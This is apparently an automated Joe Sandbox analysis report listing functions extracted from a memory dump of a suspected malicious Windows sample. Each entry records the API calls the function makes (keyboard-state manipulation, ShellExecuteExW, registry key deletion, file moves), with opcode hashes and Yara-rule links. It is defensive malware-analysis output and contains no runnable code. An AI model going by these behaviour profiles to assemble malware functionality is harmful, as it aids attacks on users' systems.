Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 57b70a8f797d46120376b2bf99cab0526df55580e1149a46a70bdde0ca124610
Instruction ID: 0840431548fad70f372b8799bb3a96a8c20c97cd0b11b8509949544ce96f5442
Opcode Fuzzy Hash: 57b70a8f797d46120376b2bf99cab0526df55580e1149a46a70bdde0ca124610
Instruction Fuzzy Hash: 2E0162F2900208BFE710A7A1DD89EF7776CDB48301F0005A6FB45F2151EA749E898B75

Function 00EFD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623

GetSystemMetrics.USER32(0000000F), ref: 00EFD78A
GetSystemMetrics.USER32(0000000F), ref: 00EFD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EFD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EFDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EFDA24
ShowWindow.USER32(00000003,00000000), ref: 00EFDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00EFDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00EFDA8B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 22efa1e3d1f47d406cd98390961be6dc58d596c56c32374a23e6511e44d3ab61
Instruction ID: b9d7907568b6ba913e1020e182c43734e5e26755e0263310c7f4dd1a31159e4a
Opcode Fuzzy Hash: 22efa1e3d1f47d406cd98390961be6dc58d596c56c32374a23e6511e44d3ab61
Instruction Fuzzy Hash: 64B1BA31604219EFCF18CF69C9857BD7BB2BF48714F08D069EE48AB295D770A950CB90

Function 00E72A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00E72ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E72B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC4D6

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: a9f37a0b5a93036492b25f64715c4d41485f5f817502741a6cb46dd64cfe5a39
Instruction ID: a9ec7e693af6e421d58286894815c2d1f96bc793dabf10650e11d62d99209af3
Opcode Fuzzy Hash: a9f37a0b5a93036492b25f64715c4d41485f5f817502741a6cb46dd64cfe5a39
Instruction Fuzzy Hash: 78415D30608781AEC7358B29CC9D7BB7BD2AF8E314F28E41DE25FBA560C635A845D710

Function 00ED7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00ED737F

Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ED73B6
EnterCriticalSection.KERNEL32(?), ref: 00ED73D2
_memmove.LIBCMT ref: 00ED7420
_memmove.LIBCMT ref: 00ED743D
LeaveCriticalSection.KERNEL32(?), ref: 00ED744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ED7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7480

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: c40224006e5cea2d4f199224ad69fbf190dfc3aead343c551dfe7497cfe6f824
Instruction ID: fa107e45891e97969ae746f585fb6743dc15f2bbd118ae7660c0b2451053ef53
Opcode Fuzzy Hash: c40224006e5cea2d4f199224ad69fbf190dfc3aead343c551dfe7497cfe6f824
Instruction Fuzzy Hash: FC31CF31A04205EFDF10DF65DC85AAEBBB8EF84700B1441B6F904BB256DB319A15DBA0

Function 00EF6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00EF645A
GetDC.USER32(00000000), ref: 00EF6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF646D
ReleaseDC.USER32(00000000,00000000), ref: 00EF6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EF64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EF64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EF9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00EF6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EF6520

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: fc2be265f3d83ec81e1f045e68346e7ae14745fcfa61af08a7fd21aad3f86281
Instruction ID: 2aa17b12f3aae86ce9f8507d34df2b187565bfa860e2cfe1920bd7f2e14c5033
Opcode Fuzzy Hash: fc2be265f3d83ec81e1f045e68346e7ae14745fcfa61af08a7fd21aad3f86281
Instruction Fuzzy Hash: AB315C72201214BFEF118F51CC8AFBA3BA9EF49765F044065FE08EA295DA759841CBA4

Function 00ECC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00ECC087
_memcmp.LIBCMT ref: 00ECC0A9
_memcmp.LIBCMT ref: 00ECC0C1
_memcmp.LIBCMT ref: 00ECC0D4
_memcmp.LIBCMT ref: 00ECC0EE
_memcmp.LIBCMT ref: 00ECC101
_memcmp.LIBCMT ref: 00ECC119
_memcmp.LIBCMT ref: 00ECC134

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e4d46b092a9cfa58f39d84ce332f967d92186eeac4a0175bab12e36252a4cfdd
Instruction ID: ad555dfbc51c5e15260ec065fdf2ad8f148c798bde1a787f336948b8ebe208e1
Opcode Fuzzy Hash: e4d46b092a9cfa58f39d84ce332f967d92186eeac4a0175bab12e36252a4cfdd
Instruction Fuzzy Hash: 5421AD62A01206B7DA55A5214E47FAF33DC9F103A8F286019FE0DB62C3E752DD12A1B6

Function 00EDED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9

_wcstok.LIBCMT ref: 00EDEEFF
_wcscpy.LIBCMT ref: 00EDEF8E
_memset.LIBCMT ref: 00EDEFC1

Strings

X, xrefs: 00EDEFFE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: a55031522e25ecf2049b63df92bf237fa036594f7243b076209128603ef3a63b
Instruction ID: a384de9f099a05da45c90d98d974660744f35afbe4e55806ba9cfdcfd1af38a7
Opcode Fuzzy Hash: a55031522e25ecf2049b63df92bf237fa036594f7243b076209128603ef3a63b
Instruction Fuzzy Hash: F9C173715083009FC714EF24C885A5AB7E4FF84314F14996EF99AAB3A2DB70ED45CB82

Function 00E71424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02d9a802bed18e8786bb019c019f5e918ddf5492e097401d2d916076380b7a3
Instruction ID: b9c70198f27b0c4c0a1cd9a01a650a25b6716a48e356fe4a55314954c889fee9
Opcode Fuzzy Hash: c02d9a802bed18e8786bb019c019f5e918ddf5492e097401d2d916076380b7a3
Instruction Fuzzy Hash: 6B715D30900219EFCB14CF59CC45ABEBBB9FF86314F14C199F919BA252D734AA51CB60

Function 00EE6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f638b3e69713b4400018e663cda446c29925dba598e6554ce7226a7aa9da550
Instruction ID: 27a72d6330f12ecb1740931e7c8b72963b84762b216491e4647d6bfbf4f984bb
Opcode Fuzzy Hash: 2f638b3e69713b4400018e663cda446c29925dba598e6554ce7226a7aa9da550
Instruction Fuzzy Hash: 5961CC32508344AFC710EB25CC85E6FB7E9EF84714F10A91DF58AA72A2DB709D05CB92

Function 00EFB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01775850), ref: 00EFB6A5
IsWindowEnabled.USER32(01775850), ref: 00EFB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EFB795
SendMessageW.USER32(01775850,000000B0,?,?), ref: 00EFB7CC
IsDlgButtonChecked.USER32(?,?), ref: 00EFB809
GetWindowLongW.USER32(01775850,000000EC), ref: 00EFB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EFB843

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 4dd669d37dce138f41d7ee2ee97b122e5226c4762b9f68dd454b36968810ed95
Instruction ID: d78831f99c32c531edc601e3b2d84786472a00032ace1c6d9a92aa76300efbad
Opcode Fuzzy Hash: 4dd669d37dce138f41d7ee2ee97b122e5226c4762b9f68dd454b36968810ed95
Instruction Fuzzy Hash: 0871BF34604208AFDB20AF64C894FBA7BB9FF89314F15516AEA45F72A1C731AD41DB50

Function 00EEF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EEF75C
_memset.LIBCMT ref: 00EEF825
ShellExecuteExW.SHELL32(?), ref: 00EEF86A

Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C

Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9

GetProcessId.KERNEL32(00000000), ref: 00EEF8E1
CloseHandle.KERNEL32(00000000), ref: 00EEF910

Strings

@, xrefs: 00EEF839

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 0e4744cb9d7d501a99dc05d3e182083aad225757e1ec04e227a7c26cf418cc28
Instruction ID: 878fce18d0a74cad14c70e793da7b0a8f9db673de7e17037204699813a41ac23
Opcode Fuzzy Hash: 0e4744cb9d7d501a99dc05d3e182083aad225757e1ec04e227a7c26cf418cc28
Instruction Fuzzy Hash: 1661AD75A00659DFCF14EF65C4809AEBBF4FF88310B149469E85ABB352CB31AD40CB94

Function 00ED145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00ED149C
GetKeyboardState.USER32(?), ref: 00ED14B1
SetKeyboardState.USER32(?), ref: 00ED1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00ED1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00ED155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00ED15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ED15C8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: fa981e5be88135ab0fd9a0b53320746b1097fefb385bbb1d60cb81ce445c35a7
Instruction ID: 402fd5f51aa5ddf6a0fa69077530704fb99442073a0e55aea3c59d2b4754f434
Opcode Fuzzy Hash: fa981e5be88135ab0fd9a0b53320746b1097fefb385bbb1d60cb81ce445c35a7
Instruction Fuzzy Hash: E95103A06083D53EFB3646348C45BBA7EA99B46308F0894CAE1D569AD2C298EC86D750

Function 00ED1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00ED12B5
GetKeyboardState.USER32(?), ref: 00ED12CA
SetKeyboardState.USER32(?), ref: 00ED132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ED1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ED1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ED13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ED13D9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b1805ce53dbcf10431f9a461fd3be5eb7a6162cd739d7746435013a870eb8874
Instruction ID: 2d8f824226c4941b2a2fad4a027bf538609afb3be52a5f496f968d0c4191af8a
Opcode Fuzzy Hash: b1805ce53dbcf10431f9a461fd3be5eb7a6162cd739d7746435013a870eb8874
Instruction Fuzzy Hash: B75126A05043D57DFB3283248C41B7A7FA9DF06308F08A4CBE1D466AD2D395EC9AE750

Function 00ED589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00ED58AC
_wcsncpy.LIBCMT ref: 00ED58E1
_wcsncpy.LIBCMT ref: 00ED5913
_wcsncpy.LIBCMT ref: 00ED5946
_wcsncpy.LIBCMT ref: 00ED5988
_wcsncpy.LIBCMT ref: 00ED59C2
_wcsncpy.LIBCMT ref: 00ED59F1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: c7ee0bced6dfe0d1677d811f983c72d6f5fb2970f8652f0b167346dec7cfc268
Instruction ID: 204e18181d2f1f4c58f167cdf06b07d846b098f7cccb2d0bacb712134c7ff7ab
Opcode Fuzzy Hash: c7ee0bced6dfe0d1677d811f983c72d6f5fb2970f8652f0b167346dec7cfc268
Instruction Fuzzy Hash: 704142A6C2052876CF11EBF488869CF77E8EF05310F50A956F918F3261E634D715C7A6

Function 00ED38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7

Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0

lstrcmpiW.KERNEL32(?,?), ref: 00ED38F3
_wcscmp.LIBCMT ref: 00ED390F
MoveFileW.KERNEL32(?,?), ref: 00ED3927
_wcscat.LIBCMT ref: 00ED396F
SHFileOperationW.SHELL32(?), ref: 00ED39DB

Strings

\*.*, xrefs: 00ED3969

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
Instruction ID: d005dc773e553cd5f6a40b3024f017534475e2e9f90c3441bb47bad5545e2dd1
Opcode Fuzzy Hash: 253d2d0de57c9d6317caa85decb51ccc5919d1a85cc985b5b1c2f89f6f20786c
Instruction Fuzzy Hash: 95417EB25093449ECB51EF64C4919EFB7E8EF88340F00292FB489E3251EA74D689C752

Function 00EF7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF75C0
IsMenu.USER32(?), ref: 00EF75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF7620
DrawMenuBar.USER32 ref: 00EF7633

Strings

0, xrefs: 00EF750D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
Instruction ID: 13a4cd8b38ad5ca4e0a35146ca851b352b2e893904bda5ee55c5e223afdae41c
Opcode Fuzzy Hash: 7188522f2bb7bd9a2a3a3c173918b19ce989136e04198b95554fb3beb4d56589
Instruction Fuzzy Hash: 1C412875A04608EFDB20DF94D884AAABBF9FF08314F059129EE55A7350D730AD54CFA0

Function 00EF122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EF125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF1286
FreeLibrary.KERNEL32(00000000), ref: 00EF133D

Part of subcall function 00EF122D: RegCloseKey.ADVAPI32(?), ref: 00EF12A3
Part of subcall function 00EF122D: FreeLibrary.KERNEL32(?), ref: 00EF12F5
Part of subcall function 00EF122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EF1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00EF12E0

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
